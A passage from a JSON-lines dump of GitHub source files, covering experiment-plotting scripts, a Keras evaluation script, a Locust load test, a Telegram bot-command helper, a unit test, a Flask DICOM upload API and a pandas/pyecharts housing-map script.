Count\",\"Type\",\"Name\",\"Requests/s\",\"Failures/s\",\"50%\",\"66%\",\"75%\",\"80%\",\"90%\",\"95%\",\"98%\",\"99%\",\"99.9%\",\"99.99%\",\"99.999%\",\"100%\",\"Total Request Count\",\"Total Failure Count\"\n pos = {}\n tail_key = '99%'\n pos[tail_key] = None\n for i, k in enumerate(fields):\n k = k.replace('\\\"', '').strip()\n if k == tail_key:\n pos[tail_key] = i\n\n # TODO: warmup is hard-coded here\n count = 0\n violations = 0\n\n beg = 61\n for line in lines[beg:]:\n data = line.strip().split(',')\n single_exp_tail_latencies.append(int(data[pos[tail_key]]))\n\n count += 1\n if single_exp_tail_latencies[-1] > qos:\n violations +=1\n \n print(np.std(single_exp_tail_latencies))\n tail_latencies[key] = np.mean(single_exp_tail_latencies)\n violation_rates[key] = float(violations)/float(count)\n\n\n print(os.path.join(rootdir, subdir, name))\n print('8'*30)\n return mean_cpu, max_cpu, tail_latencies, violation_rates\n\ndef read_data_detailed(rootdir):\n tail_latencies = {}\n\n for _, dirs, _ in os.walk(rootdir):\n for subdir in sorted(dirs, key=lambda x: (len(x), x)):\n key = int(subdir)\n\n # get latency\n single_exp_tail_latencies = []\n\n name = 'hotel_stats_history.csv'\n \n with open(os.path.join(rootdir, subdir, name), 'r') as f:\n lines = f.readlines()\n assert len(lines) > 1\n fields = lines[0].split(',')\n\n # \"Timestamp\",\"User Count\",\"Type\",\"Name\",\"Requests/s\",\"Failures/s\",\"50%\",\"66%\",\"75%\",\"80%\",\"90%\",\"95%\",\"98%\",\"99%\",\"99.9%\",\"99.99%\",\"99.999%\",\"100%\",\"Total Request Count\",\"Total Failure Count\"\n pos = {}\n tail_key = '99%'\n pos[tail_key] = None\n for i, k in enumerate(fields):\n k = k.replace('\\\"', '').strip()\n if k == tail_key:\n pos[tail_key] = i\n\n # TODO: warmup is hard-coded here\n beg = 53\n for line in lines[beg:]:\n data = line.strip().split(',')\n single_exp_tail_latencies.append(int(data[pos[tail_key]]))\n\n tail_latencies[key] = single_exp_tail_latencies\n\n return tail_latencies[4000][:41]\n\ndef read_sinan_data(rootdir, hotel=False, name=None):\n if name is None:\n fname = os.path.join(rootdir, 'results.txt')\n else:\n fname = os.path.join(rootdir, name)\n\n mean_cpu = {}\n max_cpu = {}\n tail_latencies = {}\n violation_rates = {}\n counts = {}\n\n with open(fname, 'r') as f:\n for line in f.readlines()[1:]:\n if not line.strip().split():\n break\n vals = line.strip().split()\n key = int(vals[0])\n mean_cpu[key] = float(vals[-2])\n max_cpu[key] = float(vals[-1])\n tail_latencies[key] = float(vals[2])\n violation_rates[key] = float(vals[1])\n counts[key] = 1\n \n return mean_cpu, max_cpu, tail_latencies, violation_rates\n\ndef figure1(data, fname='results.png', title='', ylabel='', ylim=None, plot_QoS=None):\n \n fontsize = 14\n\n\n plt.style.use(['seaborn-whitegrid'])\n matplotlib.rc(\"legend\", frameon=True)\n\n colors = sns.color_palette(palette='colorblind')\n\n fig = plt.figure(figsize=(9,6))\n fig, ax1 = plt.subplots()\n\n if plot_QoS:\n qos_line = plt.axhline(plot_QoS, linestyle='--', color=colors[-1], linewidth=4)\n\n ax1.plot(data, color=colors[1], linewidth=3)\n\n ax1.set_xlabel('Timestep', fontsize=fontsize)\n ax1.set_ylabel(ylabel, color=colors[1])\n ax1.set_ylim((0, 1500))\n ax1.set_xticks(list(range(5,41,5)))\n ax1.tick_params(axis='y', colors=colors[1])\n\n ax2 = ax1.twinx()\n core_allocation = [80 for _ in range(10)]\n core_allocation += [0.5 for _ in range(10)]\n core_allocation += [80 for _ in range(len(data) - len(core_allocation))]\n ax2.plot(core_allocation, color=colors[2], linewidth=3)\n ax2.set_ylabel('Core Allocation', color=colors[2])\n ax2.set_yscale('log')\n ax2.set_ylim((0.1, 100))\n ax2.tick_params(axis='y', colors=colors[2])\n\n\n beta = scipy.stats.beta(2.3,3.5)\n x_axis = [x/100. for x in range(100)]\n x_axis = list(range(9)) + [x * 30. + 10 for x in x_axis]\n beta_samples = [0. for _ in range(9)] + [beta.pdf(x/100.) for x in range(100)]\n ax3 = ax1.twinx()\n ax3.set_ylim(-0.1, 2.0)\n ax3.axis('off')\n ax3.plot(x_axis, beta_samples, color=colors[0], linewidth=3)\n\n if title:\n plt.title(title, fontsize=fontsize)\n\n plt.savefig(fname, bbox_inches='tight', dpi=150)\n plt.clf()\n\ndef bar_plot_paper_quality(data, append_mean=False, fname='results.png', title='', ylabel='', hotel=False, ylim=None,\n plot_QoS=None, num_methods=3, transfer=False):\n \n fontsize = 20\n\n plt.style.use(['seaborn-whitegrid'])\n matplotlib.rc(\"font\", size=fontsize)\n\n labels = list(data[0].keys())\n all_data = []\n for d in data:\n single_method_data = []\n for key in labels:\n single_method_data.append(d[key])\n \n if append_mean:\n single_method_data.append(np.mean(single_method_data))\n \n all_data.append(single_method_data)\n \n if append_mean:\n labels += ['Mean']\n columns = [str(x) for x in labels]\n columns[0] += ' U'\n if not transfer:\n rows = ('RECLAIMER', 'Sinan', 'AutoScale',)\n rows = rows[:num_methods]\n else:\n rows = ('Transfer', 'Random Init')\n \n if transfer:\n colors = sns.color_palette(palette='colorblind')[4:6]\n else:\n colors = sns.color_palette(palette='colorblind')\n colors[:3] = colors[:3][::-1]\n\n bar_width = 0.15\n\n # Initialize the vertical-offset for the stacked bar chart.\n index = np.arange(len(labels))\n fig = plt.figure(figsize=(15,6))\n\n cell_text = []\n for idx, d in enumerate(all_data):\n plt.bar(index+bar_width*(idx-((len(all_data)-1)/2)), d, bar_width, color=colors[idx])\n if np.max(d) >= 100:\n cell_text.append(['%1.0f' % (x) for x in d])\n elif np.max(d) >= 10:\n cell_text.append(['%1.1f' % (x) for x in d])\n else:\n cell_text.append(['%1.2f' % (x) for x in d])\n \n bbox = [0.03, -0.35, 0.94, 0.35]\n if hotel:\n bbox = [0.02, -0.35, 0.96, 0.35]\n tab = plt.table(cellText=cell_text,\n rowLabels=rows,\n rowColours=colors,\n colLabels=columns,\n loc='bottom',\n cellLoc='center',\n bbox=bbox\n )\n tab.auto_set_font_size(False)\n tab.set_fontsize(fontsize)\n\n for (row, col), cell in tab.get_celld().items():\n if (row == 0) or (col == -1):\n cell.set_text_props(fontproperties=FontProperties(weight='bold'), fontsize=fontsize)\n\n fig.subplots_adjust(left=0.2, bottom=0.1)\n\n if plot_QoS:\n plt.axhline(plot_QoS, linestyle='--', color=colors[-1])\n\n plt.ylim(ylim)\n plt.ylabel(ylabel, fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n plt.xticks([])\n if title:\n plt.title(title, fontsize=fontsize)\n\n fig = plt.gcf()\n plt.savefig(fname, bbox_inches='tight', dpi=150)\n plt.clf()\n\nif __name__=='__main__':\n qos = 500\n\n violation_ylim = (0, 0.042)\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/us/eval_notransformer/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/sinan/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_sinan_data(rootdir, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/socialNetwork/conservative/evaluate/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='social-mean_cpu.png',\n ylabel='Mean Allocated CPUs')\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='social-max_cpu.png',\n ylabel='Maximum Allocated CPUs')\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='social-tail_latency.png',\n ylabel='Tail Latency (ms)',\n plot_QoS=qos, ylim=(0, qos*1.05))\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='social-violation_rate.png',\n ylabel='Violation Rate', ylim=violation_ylim)\n\n\n ###################### HOTEL ######################\n\n\n qos = 200\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/cpu/hotel/us/eval_noexploit_publish2_nohat/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n rootdir = './results/evaluation_results/cpu/hotel/us/eval_retrain/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=True)\n del_keys = []\n for key, val in mean_cpu.items():\n if int(key) > 3500:\n del_keys.append(key)\n for key in del_keys:\n mean_cpu.pop(key, None)\n max_cpu.pop(key, None)\n tail_latencies.pop(key, None)\n violation_rates.pop(key, None)\n\n\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/hotel/sinan/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_sinan_data(rootdir, hotel=True, name='results8.txt')\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/cpu/hotel/conservative/eval_noexploit_publish/sac/gym_dsb-dsb-social-media-v0/locust_results/'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=True)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='hotel-mean_cpu.png',\n ylabel='Mean Allocated CPUs', hotel=True)\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='hotel-max_cpu.png',\n ylabel='Maximum Allocated CPUs', hotel=True)\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='hotel-tail_latency.png',\n ylabel='Tail Latency (ms)', hotel=True, plot_QoS=qos, ylim=(0, qos*1.05))\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='hotel-violation_rate.png',\n ylabel='Violation Rate', hotel=True, ylim=violation_ylim)\n\n ###################### Figure 1 ######################\n\n rootdir = './results/evaluation_results/figure1/sac/gym_dsb-dsb-social-media-v0/locust_results'\n tail_latencies= read_data_detailed(rootdir)\n figure1(tail_latencies, fname=\"figure1.png\", ylabel='Tail Latency (ms)', plot_QoS=200)\n\n ###################### Transfer Hotel -> Social ######################\n\n\n qos = 500\n\n all_mean_cpu, all_max_cpu, all_tail, all_violation = [], [], [], []\n\n rootdir = './results/evaluation_results/transfer/h_to_s_publish2/sac/gym_dsb-dsb-social-media-v0/locust_results'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n rootdir = './results/evaluation_results/transfer/baseline2/sac/gym_dsb-dsb-social-media-v0/locust_results'\n mean_cpu, max_cpu, tail_latencies, violation_rates = read_data(rootdir, qos, hotel=False)\n all_mean_cpu.append(mean_cpu)\n all_max_cpu.append(max_cpu)\n all_tail.append(tail_latencies)\n all_violation.append(violation_rates)\n\n bar_plot_paper_quality(all_mean_cpu, append_mean=True, fname='transfer-mean_cpu.png',\n ylabel='Mean Allocated CPUs', hotel=True, num_methods=1, transfer=True)\n \n bar_plot_paper_quality(all_max_cpu, append_mean=True, fname='transfer-max_cpu.png',\n ylabel='Maximum Allocated CPUs', hotel=True, num_methods=1, transfer=True)\n\n bar_plot_paper_quality(all_tail, append_mean=True, fname='transfer-tail_latency.png',\n ylabel='Tail Latency (ms)', hotel=True, plot_QoS=qos, ylim=(0, qos*1.05), num_methods=1, transfer=True)\n \n bar_plot_paper_quality(all_violation, append_mean=True, fname='transfer-violation_rate.png',\n ylabel='Violation Rate', hotel=True, ylim=violation_ylim, num_methods=1, transfer=True)","repo_name":"qfettes/reclaimer","sub_path":"DeepRL/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":14891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17994493009","text":"from pathlib import Path\nfrom glob import glob\nimport numpy as np\nimport pandas as pd\n\nfrom skimage.io import imread\nfrom skimage.transform import resize\nimport tensorflow.keras as keras\nfrom tensorflow.keras.layers import (Conv2D, MaxPooling2D, Dense, ReLU, Dropout, \n Flatten, GlobalAveragePooling2D)\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.optimizers import SGD\nfrom sklearn.metrics import classification_report\n\n\ndef prepare_data(img_path):\n train_paths_F = glob(str(img_path/'aligned/*F/*.jpg'), recursive=True)\n train_paths_M = glob(str(img_path/'aligned/*M/*.jpg'), recursive=True)\n val_paths_F = glob(str(img_path/'valid/*F/*.jpg'), recursive=True)\n val_paths_M = glob(str(img_path/'valid/*M/*.jpg'), recursive=True)\n\n # make train df\n train_df = make_img_df(train_paths_F, train_paths_M)\n val_df = make_img_df(val_paths_F, val_paths_M)\n\n print('Data preparation completed!')\n\n return train_df, val_df\n\n\ndef make_img_df(paths_F, paths_M):\n df_F = pd.DataFrame(paths_F, columns=['fpath'])\n df_F['gender'] = 'f'\n\n df_M = pd.DataFrame(paths_M, columns=['fpath'])\n df_M['gender'] = 'm'\n\n df = pd.concat([df_F, df_M], axis=0)\n df = df.sample(frac=1).reset_index(drop=True)\n\n return df\n\n\nif __name__ == \"__main__\":\n\n img_path = Path('./data/combined/')\n batch_size = 64\n \n # Recreate the exact same model, including weights and optimizer.\n gender_model = keras.models.load_model('gender_cls_model.h5')\n print(gender_model.summary())\n \n # make train/val dataframe\n train_df, val_df = prepare_data(img_path)\n \n # Valid generator\n val_datagen = ImageDataGenerator(data_format='channels_first')\n val_generator = val_datagen.flow_from_dataframe(val_df,\n x_col='fpath',\n y_col='gender',\n target_size=(224, 224),\n batch_size=batch_size,\n class_mode='binary')\n \n # Overall loss and Accuracy\n print('Evaluating model...')\n overall_loss, overall_acc = gender_model.evaluate_generator(val_generator,\n use_multiprocessing=True,\n max_queue_size=10,\n workers=4,\n verbose=1)\n print(f'Overall Loss: {round(overall_loss, 3)}, Overall Accuracy: {round(overall_acc, 3)}\\n')\n \n # Class accuracy\n print('Making predictions...')\n val_generator_all = val_datagen.flow_from_dataframe(\n val_df,\n x_col='fpath',\n y_col='gender',\n target_size=(224, 224),\n batch_size=val_df.shape[0],\n class_mode='binary')\n X, y = next(iter(val_generator_all))\n pred = gender_model.predict(X, verbose=1)\n pred = pred.squeeze()\n pred = [1 if p > 0.5 else 0 for p in pred]\n print(classification_report(y, pred, target_names=['Female', 'Male']))","repo_name":"xhan0909/VGGFace_Keras_Implmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10665588080","text":"n = int(input())\n\nnames = list(input() for _ in range(n))\nans = []\n\nfor i in range(n):\n f = names[i][0]\n cnt = 0\n for j in range(n):\n if names[j][0] == f:\n cnt += 1\n if cnt >= 5:\n ans.append(f)\n\nif len(ans) == 0:\n print('PREDAJA')\nelse:\n ans.sort()\n ans = set(ans)\n print(''.join(map(str,ans)))\n\n\n# --------------------------------------------------------------------#\n\nn = int(input())\n\nfirstnames = []\n\nfor i in range(n):\n name = input()\n firstnames.append(name[0])\n\nans = []\n\nfor i in firstnames:\n if firstnames.count(i) >= 5 and i not in ans:\n ans.append(i)\n\nif len(ans) == 0:\n print('PREDAJA')\nelse:\n print(''.join(sorted(ans)))\n","repo_name":"petteloiv/Algorithm","sub_path":"백준/1159_농구경기.py","file_name":"1159_농구경기.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"36487955176","text":"from locust import HttpUser, task, constant_throughput\nimport random\nimport json\n\nclass TestProfileUser(HttpUser):\n wait_time = constant_throughput(50)\n\n @task\n def read_profile(self):\n id = random.randrange(1, 51)\n url = f\"/api/v1/profile/{id}/\"\n with self.client.get(url, catch_response=True) as response:\n print(f'read, {response.status_code}, {url}' )\n\n @task\n def update_profile(self):\n id = random.randrange(1, 51)\n url = f'/api/v1/profile/{id}/'\n data = {\n \"name\": f\"test_{id}\"\n }\n payload = json.dumps(data)\n headers = {'content-type': 'application/json'}\n with self.client.patch(url, headers=headers, json=data, catch_response=True) as response:\n print(f'update, {response.status_code}, {url}' )\n","repo_name":"storemesh/baylog","sub_path":"experiment02/locust/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"16732172852","text":"import cv2\nimport unittest\nfrom dyda_utils import tools\nfrom dyda_utils import tinycv\nfrom dyda_utils import lab_tools\nfrom dyda_utils import dict_comparator\nfrom dyda.components.image_processor import ExtractNonBlackImageProcessor\n\ninput_data = cv2.imread('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/input.jpg')\nref_output = cv2.imread('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/ref_output.bmp')\nref_results = tools.parse_json('/home/shared/DT42/test_data/test_ExtractNonBlackImageProcessor/ref_results.json')\n\nclass TestExtractNonBlackImageProcessor_simple(unittest.TestCase):\n \"\"\" Test simple case. \"\"\"\n\n def test_main_process(self):\n \"\"\" Main process of unit test. \"\"\"\n\n # initialization\n comp = ExtractNonBlackImageProcessor()\n\n # run component\n comp.reset()\n comp.input_data = input_data\n comp.run()\n\n # compare output_data with reference\n tar_data = comp.output_data\n img_diff = lab_tools.img_comparator(tar_data, ref_output)\n self.assertEqual(img_diff, 0.0)\n\n # compare results with reference\n tar_data = comp.results\n report = dict_comparator.get_diff(ref_results, tar_data)\n self.assertEqual(report['extra_field'], [])\n self.assertEqual(report['missing_field'], [])\n self.assertEqual(report['mismatch_val'], [])\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"numbersprotocol/dyda","sub_path":"tests/test_ExtractNonBlackImageProcessor.py","file_name":"test_ExtractNonBlackImageProcessor.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"14834999237","text":"from aiogram import Bot\nfrom aiogram.types import BotCommand, BotCommandScopeDefault\n\n\nclass SetCommands:\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.commands = None\n\n async def _default_commands(self):\n \"\"\"Set of commands with description\"\"\"\n await self.bot.set_my_commands([\n BotCommand(command=\"start\", description=\"Старт\"),\n BotCommand(command=\"help\", description=\"Помощь\"),\n ], scope=BotCommandScopeDefault())\n\n async def set_default_commands(self):\n commands = await self.bot.get_my_commands()\n if commands:\n await self.bot.delete_my_commands()\n await self._default_commands()","repo_name":"DonOutcast/crossfit-bot","sub_path":"src/telegram_bot/model/commnad_scope/scopes.py","file_name":"scopes.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"62"} +{"seq_id":"26255251739","text":"import os\nimport shutil\n\nimport SimpleITK as sitk\nfrom numpy.testing import assert_allclose\nfrom picai_prep.dcm2dce import Dicom2DCEConverter\n\n\ndef test_dce_conversion(\n input_dir: str = \"tests/input/dcm/ProstateX\",\n output_dir: str = \"tests/output/mha/ProstateX\",\n output_expected_dir: str = \"tests/output-expected/mha/ProstateX\",\n):\n \"\"\"\n Convert DCE series to single 4D MHA.\n \"\"\"\n # remove output folder (to prevent skipping the conversion)\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n\n # test usage from command line\n archive = Dicom2DCEConverter(\n input_dir=input_dir,\n output_dir=output_dir,\n dcm2dce_settings=\"tests/output/dcm2mha_settings.json\"\n )\n case = archive.cases[-1]\n case.initialize()\n case.extract_metadata()\n case._convert_dce(output_dir)\n\n # compare output\n for patient_id, subject_id in [\n (\"ProstateX-0218\", \"ProstateX-0218_02-18-2011\"),\n ]:\n for modality in [\"dce\"]:\n # construct paths to MHA images\n path_out = os.path.join(output_dir, patient_id, f\"{subject_id}_{modality}.mha\")\n path_out_expected = os.path.join(output_expected_dir, patient_id, f\"{subject_id}_{modality}.mha\")\n\n # sanity check: check if outputs exist\n assert os.path.exists(path_out), f\"Could not find output file at {path_out}!\"\n assert os.path.exists(path_out_expected), f\"Could not find output file at {path_out_expected}!\"\n\n # read images\n img = sitk.GetArrayFromImage(sitk.ReadImage(str(path_out)))\n img_expected = sitk.GetArrayFromImage(sitk.ReadImage(str(path_out_expected)))\n\n # compare images\n assert_allclose(img_expected, img)\n","repo_name":"DIAGNijmegen/picai_prep","sub_path":"tests/test_dcm2dce.py","file_name":"test_dcm2dce.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"62"} +{"seq_id":"71942988356","text":"from flask import request, jsonify, send_file\n\nfrom jsonschema import ValidationError\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nimport os\nfrom bson.objectid import ObjectId, InvalidId\n\nfrom api.v1.views import app_views\nfrom api.v1.models import File, UserMongo\nfrom api.v1.models.tables import Patient, Study, Series, Instance, User\nfrom api.v1.utils.zipping import zip_file, extract_and_return_dicom_list\nfrom api.v1.utils.caching import redis_client\nfrom api.v1.utils.database import mongo, db\nfrom api.v1.utils.token import authorize\n\nload_dotenv()\n\nDICOM_FOLDER = os.getenv('DICOM_FOLDER', '/tmp/dicom_files')\n\n\n@app_views.route('/files', methods=['POST'])\n@authorize\ndef upload_file(email):\n \"\"\"Upload dicom files to mongodb\"\"\"\n\n user = User.get_user(email)\n if not user:\n return jsonify({'error': 'User not found'}), 404\n user_mongo = UserMongo.get_user(email)\n \n # Get all dicom files from request\n dicom_files = []\n for file in request.files.values():\n if file.filename.lower().endswith('.zip'):\n dicom_files += extract_and_return_dicom_list(file)\n elif file.filename.lower().endswith('.dcm'):\n dicom_files.append(file)\n if not dicom_files:\n return jsonify({'error': 'No dicom files provided'}), 400\n\n # Create folder if not exists\n os.makedirs(DICOM_FOLDER, exist_ok=True)\n\n # Save files to databases\n try:\n for file in dicom_files:\n\n # save file to mongodb\n data = File.extract_metadata_from_dicom(file)\n if not data:\n return jsonify({'error': 'Invalid file'}), 400\n data['uploader_id'] = str(user_mongo['_id'])\n new_file = File(**data)\n new_file.save()\n \n # save metadata to MySQL\n patient_data = Patient.extract_patient_metadata_from_file(new_file)\n existing_patient = Patient.get_patient_by_patientID(patient_data.get('patientID', ''))\n if existing_patient:\n patient = existing_patient\n else:\n patient = Patient(**patient_data)\n if user not in patient.users:\n patient.users.append(user)\n\n study_data = Study.extract_study_metadata_from_file(new_file)\n existing_study = Study.get_study_by_studyInstanceUID(study_data.get('studyInstanceUID', ''))\n if existing_study:\n study = existing_study\n else:\n study = Study(**study_data)\n study.patient = patient\n if user not in study.users:\n study.users.append(user)\n\n series_data = Series.extract_series_metadata_from_file(new_file)\n existing_series = Series.get_series_by_seriesInstanceUID(series_data.get('seriesInstanceUID', ''))\n if existing_series:\n series = existing_series\n else:\n series = Series(**series_data)\n series.study = study\n if user not in series.users:\n series.users.append(user)\n\n instance_data = Instance.extract_instance_metadata_from_file(new_file)\n existing_instance = Instance.get_instance_by_sopInstanceUID(instance_data.get('sopInstanceUID', ''))\n if existing_instance:\n instance = existing_instance\n else:\n instance = Instance(**instance_data)\n instance.filepath = new_file.filepath\n instance.series = series\n if user not in instance.users:\n instance.users.append(user)\n \n db.session.add_all([patient, study, series, instance])\n db.session.commit()\n \n # Update user\n try:\n update_query = {\n \"$push\": {\n \"files\": new_file.filepath,\n },\n \"$set\": {\n \"updated_at\": datetime.now()\n }\n }\n mongo.db.users.update_one({\"email\": email}, update_query)\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # generate or append to a zip\n zip_folder = DICOM_FOLDER + '/zip'\n os.makedirs(zip_folder, exist_ok=True)\n output_zip =f\"{zip_folder}/{new_file.metadata['studyInstanceUID']}.zip\"\n zip_file(output_zip, file)\n redis_client.set(new_file.metadata['seriesInstanceUID'], output_zip)\n\n return jsonify({'message': 'File uploaded successfully'}), 201\n except ValidationError:\n return jsonify({'error': 'Invalid file'}), 400\n\n\n@app_views.route('/files', methods=['GET'])\n@authorize\ndef get_files(email):\n \"\"\"Get all files uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n files = mongo.db.files.find({\"uploader_id\": str(user['_id'])})\n return jsonify([File.serialize_file(file) for file in files]), 200\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files/', methods=['GET'])\n@authorize\ndef get_file(email, file_id):\n \"\"\"Get a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n file = mongo.db.files.find_one({\"_id\": ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n return jsonify(File.serialize_file(file)), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files/', methods=['DELETE'])\n@authorize\ndef delete_file(email, file_id):\n \"\"\"Delete a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n # delete file from mongodb\n file = mongo.db.files.find_one({\"_id\": ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n mongo.db.files.delete_one({\"_id\": ObjectId(file_id)})\n\n # remove file from user's files\n try:\n update_query = {\n \"$pull\": {\n \"files\": file['filepath']\n },\n \"$set\": {\n \"updated_at\": datetime.now()\n }\n }\n mongo.db.users.update_one({\"email\": email}, update_query)\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # remove file from MySQL\n try:\n instance = Instance.get_instance_by_sopInstanceUID(file['metadata']['sopInstanceUID'])\n instance.delete()\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n \n # remove file from filesystem\n try:\n os.remove(file['filepath'])\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n return jsonify({'message': 'File deleted successfully'}), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n\n\n@app_views.route('/files//download', methods=['GET'])\n@authorize\ndef download_file(email, file_id):\n \"\"\"Download a file uploaded by a user\"\"\"\n try:\n user = UserMongo.get_user(email)\n except Exception:\n return jsonify({'error': 'User not found'}), 404\n \n try:\n file = mongo.db.files.find_one({\"_id\": ObjectId(file_id), \"uploader_id\": str(user['_id'])})\n if not file:\n return jsonify({'error': 'File not found'}), 404\n return send_file(file['filepath'], as_attachment=True), 200\n except InvalidId:\n return jsonify({'error': 'Invalid file id'}), 400\n except Exception as e:\n print(e)\n return jsonify({'error': 'Something went wrong!'}), 500\n","repo_name":"Sonlowami/DCStore","sub_path":"backend/src/api/v1/views/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":8559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10732932162","text":"import pandas as pd\nfrom pyecharts.charts import *\nfrom pyecharts import options as opts\nfrom pyecharts.globals import SymbolType, ThemeType\n\ndf = pd.read_csv('jieguo.csv', usecols=[2, 4, 5, 8, 21])\ndf['建筑面积'] = df['建筑面积'].apply(lambda a: a[:-1]).astype('float')\n\n# 按照类别进行分组,并计算单价、面积、总价的平均值\nagg_data = df.groupby('类别', as_index=False)['单价', '建筑面积', '总价'].mean().round(2)\n\n# 获取每种类别的数量\ncount_data = df['类别'].value_counts().reset_index()\ncount_data.columns = ['类别', '数量']\n\n# 合并两个聚合结果\nresult = pd.merge(agg_data, count_data, on='类别')\nprint(result)\n\n\n# df.info()\n# print(df.head(5))\ndef category_0():\n category = df.loc[df['类别'] == 0]\n # print(category)\n category0 = category.groupby(['所在区市']).count()['单价']\n x = category0.index.tolist()\n y = category0.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category0)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], \"上海\")\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"0类\"), visualmap_opts=opts.VisualMapOpts()\n )\n .render(\"KMeans结果/第0类分布.html\")\n )\n\n\ndef category_1():\n category = df.loc[df['类别'] == 1]\n # print(category)\n category1 = category.groupby(['所在区市']).count()['单价']\n x = category1.index.tolist()\n y = category1.values.tolist()\n # print(x, y)\n new_x = [x + '区' for x in x]\n print(category1)\n c = (\n Map(init_opts=opts.InitOpts(width=\"1500px\", height=\"800px\"))\n .add(\"上海\", [list(z) for z in zip(new_x, y)], 